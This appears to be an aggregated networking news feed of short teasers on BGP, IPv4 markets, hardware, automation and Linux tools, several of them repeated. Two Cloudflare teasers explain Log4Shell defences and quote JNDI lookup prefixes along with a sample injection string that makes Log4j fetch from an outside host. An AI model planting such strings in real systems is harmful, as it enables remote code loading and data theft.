Highlights: Dynamic Negotiation of BGP Capabilities

The Dynamic Negotiation of BGP Capabilities blog post generated almost no comments, apart from the #facepalm realization that a certain network operating system resets IBGP sessions when the sole EBGP session goes down, but there were a few interesting comments on LinkedIn and Twitter.

While most engineers easily relate to the awkwardness of bringing down a BGP session to enable new functionality (Tearing down BGP session, as a solution reminds me rebooting a host, as a solution.), it’s not as easy as it looks. As Adam Chappell put itDynamic capability renegotiation does tend to sound a bit like changing the tyres while still moving. Very neat if you can pull it off but so much to go wrong…

IPv4 Address Markets

We have come down a long and tortuous path with respect to the treatment of Internet addresses. The debate continues over whether the formation of markets for IPv4 addresses was a positive step for the Internet, or a forced decision that was taken with extreme reluctance. Let’s scratch at this topic and look at the formation of this market in IP addresses and the dynamics behind it and then look at the future prospects for this market.

Equinix expands adds more processors to its bare-metal service

Data-center giant Equinix has expanded its bare-metal services to offer CPU, GPU, and AI processors on its Equinix Metal service offering.The service now includes AMD’s Milan generation of Epyc processors, Ampere’s Arm-based Altra, and Intel’s Ice Lake generation of Xeon processors.[Get regularly scheduled insights by signing up for Network World newsletters.] In November, Nvidia and Equinix announced an expanded collaboration to bring Nvidia’s LaunchPad AI platform, which includes instant, short-term access to AI infrastructure, to nine Equinix International Business Exchange (IBX) data centers globally. Enterprise accounts can test AI apps on LaunchPad, then deploy and scale on Equinix Metal or Nvidia DGX Foundry, which are also running at Equinix. To read this article in full, please click here

Equinix expands adds more processors to its bare-metal service

Data-center giant Equinix has expanded its bare-metal services to offer CPU, GPU, and AI processors on its Equinix Metal service offering.The service now includes AMD’s Milan generation of Epyc processors, Ampere’s Arm-based Altra, and Intel’s Ice Lake generation of Xeon processors.[Get regularly scheduled insights by signing up for Network World newsletters.] In November, Nvidia and Equinix announced an expanded collaboration to bring Nvidia’s LaunchPad AI platform, which includes instant, short-term access to AI infrastructure, to nine Equinix International Business Exchange (IBX) data centers globally. Enterprise accounts can test AI apps on LaunchPad, then deploy and scale on Equinix Metal or Nvidia DGX Foundry, which are also running at Equinix. To read this article in full, please click here

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

In this blog post we will cover WAF evasion patterns and exfiltration attempts seen in the wild, trend data on attempted exploitation, and information on exploitation that we saw prior to the public disclosure of CVE-2021-44228.

In short, we saw limited testing of the vulnerability on December 1, eight days before public disclosure. We saw the first attempt to exploit the vulnerability just nine minutes after public disclosure showing just how fast attackers exploit newly found problems.

We also see mass attempts to evade WAFs that have tried to perform simple blocking, we see mass attempts to exfiltrate data including secret credentials and passwords.

WAF Evasion Patterns and Exfiltration Examples

Since the disclosure of CVE-2021-44228 (now commonly referred to as Log4Shell) we have seen attackers go from using simple attack strings to actively trying to evade blocking by WAFs. WAFs provide a useful tool for stopping external attackers and WAF evasion is commonly attempted to get past simplistic rules.

In the earliest stages of exploitation of the Log4j vulnerability attackers were using un-obfuscated strings typically starting with ${jndi:dns, ${jndi:rmi and ${jndi:ldap and simple rules to look for those patterns were effective.

Quickly after those strings were being blocked and attackers Continue reading

IBM, Samsung team on unconventional, super-efficient semiconductor

IBM and Samsung Electronics have designed what the tech giants call an unconventionally designed semiconductor that promises to reduce energy consumption by 85% over existing chips.The design would enable a ton of new applications including energy-efficient cryptomining and data encryption but also cell phone batteries that could hold a charge for over a week instead of days without being recharged, companies stated.[Get regularly scheduled insights by signing up for Network World newsletters.] The new semiconductor could also find its way into new internet of things (IoT) and edge devices that draw less energy, letting them operate in more diverse environments like ocean buoys, autonomous vehicles and spacecraft, the companies stated. To read this article in full, please click here

IBM,Samsung team on unconventional, super-efficient semiconductor

IBM and Samsung Electronics have designed what the tech giants call an unconventionally designed semiconductor that promises to reduce energy consumption by 85% over existing chips.The design would enable a ton of new applications including energy-efficient cryptomining and data encryption but also cell phone batteries that could hold a charge for over a week instead of days without being recharged, companies stated.[Get regularly scheduled insights by signing up for Network World newsletters.] The new semiconductor could also find its way into new internet of things (IoT) and edge devices that draw less energy, letting them operate in more diverse environments like ocean buoys, autonomous vehicles and spacecraft, the companies stated. To read this article in full, please click here

Full Stack Journey 061: Linux Networking And Observability With eBPF And Cilium

eBPF has taken the Linux networking world by storm. But what is it, exactly? And how it is related to the open-source Cilium project? Duffie Cooley joins Scott Lowe on the Full Stack Journey podcast to discuss eBPF and Cilium. If you're into Linux, networking, or Kubernetes---or any combination of these---this episode is for you!

The post Full Stack Journey 061: Linux Networking And Observability With eBPF And Cilium appeared first on Packet Pushers.

New reference architecture: Deploying Red Hat Ansible Automation Platform 2.1

RA 2.1

With the release of Red Hat Ansible Automation Platform 2.1, we are proud to deliver the latest reference architecture on the best practices for deploying a highly available Ansible Automation Platform environment

Why are you going to love it?

This reference architecture focuses on providing a step-by-step deployment procedure to install and configure a highly available Ansible Automation Platform environment from start to finish.

B
ut there’s more!

Aside from the key steps to install Ansible Automation Platform, it incorporates key building blocks to optimize your Ansible Automation Platform environments, including:

  • Centralized logging across multiple Ansible Automation Platform environments.

  • Securing installation inventory passwords using ansible-vault.

  • Using a combination of GitOps practices (configuration as code capabilities) and Git webhooks to streamline the automation and delivery of configurations to multiple Ansible Automation Platform sites automatically, immediately and consistently. 

What are the foundational pieces to this reference architecture?

The reference architecture consists of two environments of Ansible Automation Platform: Ansible Site 1 and Ansible Site 2 for high availability. Site 1 is an active environment while Site 2 is a passive environment. Each site consists of the following:

  • A three node automation controller cluster with one PostgreSQL database.

  • Continue reading

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

On December 9, 2021, the world learned about CVE-2021-44228, a zero-day exploit affecting the Apache Log4j utility.  Cloudflare immediately updated our WAF to help protect against this vulnerability, but we recommend customers update their systems as quickly as possible.

However, we know that many Cloudflare customers consume their logs using software that uses Log4j, so we are also mitigating any exploits attempted via Cloudflare Logs. As of this writing, we are seeing the exploit pattern in logs we send to customers up to 1000 times every second.

Starting immediately, customers can update their Logpush jobs to automatically redact tokens that could trigger this vulnerability. You can read more about this in our developer docs or see details below.

How the attack works

You can read more about how the Log4j vulnerability works in our blog post here. In short, an attacker can add something like ${jndi:ldap://example.com/a} in any string. Log4j will then make a connection on the Internet to retrieve this object.

Cloudflare Logs contain many string fields that are controlled by end-users on the public Internet, such as User Agent and URL path. With this vulnerability, it is possible that a malicious user can cause a remote Continue reading

Checking Network Device Configurations in a GitOps CI Pipeline

Here’s a fun fact network automation pundits don’t want to hear: if you’re working with replaceable device configurations (as we did for the past 20 years, at least those fortunate enough to buy Junos), you already meet the Infrastructure-as-Code requirements. Storing device configurations in a version control system and using reviews and merge requests to change them (aka GitOps) is just a cherry on the cake.

When I made a claim along these same lines a few weeks ago during the Network Automation Concepts webinar, Vladimir Troitskiy sent me an interesting question:

Checking Network Device Configurations in a GitOps CI Pipeline

Here’s a fun fact network automation pundits don’t want to hear: if you’re working with replaceable device configurations (as we did for the past 20 years, at least those fortunate enough to buy Junos), you already meet the Infrastructure-as-Code requirements. Storing device configurations in a version control system and using reviews and merge requests to change them (aka GitOps) is just a cherry on the cake.

When I made a claim along these same lines a few weeks ago during the Network Automation Concepts webinar, Vladimir Troitskiy sent me an interesting question:

Unifi docker upgrade

This post is mostly a note to self for when I need to upgrade next time.

Because of the recent bug in log4j, which also affected the Unifi controller, I decided to finally upgrade the controller software.

Some background: There a few different ways to run the controller. You can use “the cloud”, run it yourself on some PC or raspberry pi, or you can buy their appliance.

I run it myself, because I already have a raspberry pi 4 running, which is cheaper than the appliance, and gives me control of my data and works during an ISP outage.

I thought it’d be a good opportunity to play with docker, too.

How to upgrade

Turns out I’d saved the command I used to create the original docker image. Good thing too, because it seems that upgrading is basically delete the old, install the new.

  1. Take a backup from the UI.
  2. Stop the old instance (docker stop <old-name-here>).
  3. Take a backup of the state directory.
  4. Make sure the old instance doesn’t restart (docker update --restart=no <old-name-here>).
  5. Create a new instance with the same state directory.
  6. Wait a long time (at least on Raspberry Pi), like Continue reading

Intel, hardware vendors working on a high-performance network card

Intel announced a collaboration with Inspur, Ruijie Networks, and Silicom Connectivity Solutions to design and develop new infrastructure processing units (IPU) using both a CPU and FPGA.IPU—what Intel calls a data-processing unit (DPU)—is a programmable networking device designed to offload network processing tasks such as storage virtualization, network virtualization, and security from the CPU. That reduces overhead and frees up the CPU to focus on its primary data-processing functions. They are becoming a real growth industry, with multiple products on the market from Nvidia, Marvell, Fungible, and Xilinx.To read this article in full, please click here

Intel teams with hardware vendors for high-performance network card

Intel announced a collaboration with Inspur, Ruijie Networks, and Silicom Connectivity Solutions to design and develop new infrastructure processing units (IPU) using both a CPU and FPGA.IPU--what Intel calls a data-processing unit (DPU)--is a programmable networking device designed to offload network processing tasks such as storage virtualization, network virtualization, and security from the CPU. That reduces overhead and frees up the CPU to focus on its primary data-processing functions. They are becoming a real growth industry, with multiple products on the market from Nvidia, Marvell, Fungible, and Xilinx.To read this article in full, please click here

The latest tape storage is faster and holds more, but is it better?

Magnetic storage tape has’t been the recommended destination for the initial backup copy of data for quite some time, and the question is whether LTO-9, the latest tape open standard, and other market dynamics will changed that.Here's a look at modern tape drives, discussion of the degree to which ransomware changes the equation, and a closer look at LTO-9.[Get regularly scheduled insights by signing up for Network World newsletters.] Tape drives: Too fast for their own good?In the 80s and early 90s, there was almost a perfect match between the speed of tape drives and the speed of the backup infrastructure. The backup drives were capable of writing at roughly the same speed that the backup system could send.To read this article in full, please click here

Looking at Linux disk usage with the ncdu command

The ncdu command provides a useful and convenient way to view disk usage. The name stands for "NCurses disk usage". This means that it's based on ncurses which, like curses, is a terminal control library used on Unix/Linux systems. The curses part of each name is a pun on "cursor" or "cursor optimization" and is unrelated to the use of foul language.You can think of ncdu as a disk usage analyzer with an ncurses interface. It can be especially useful when looking for disk-space hogs on a remote server for which you don't have access to a graphical interface.[Get regularly scheduled insights by signing up for Network World newsletters.] To use ncdu, you can just type "ncdu", but what you will see depends on where you have positioned yourself in the file system as it reports the space used by files and directories in that location.To read this article in full, please click here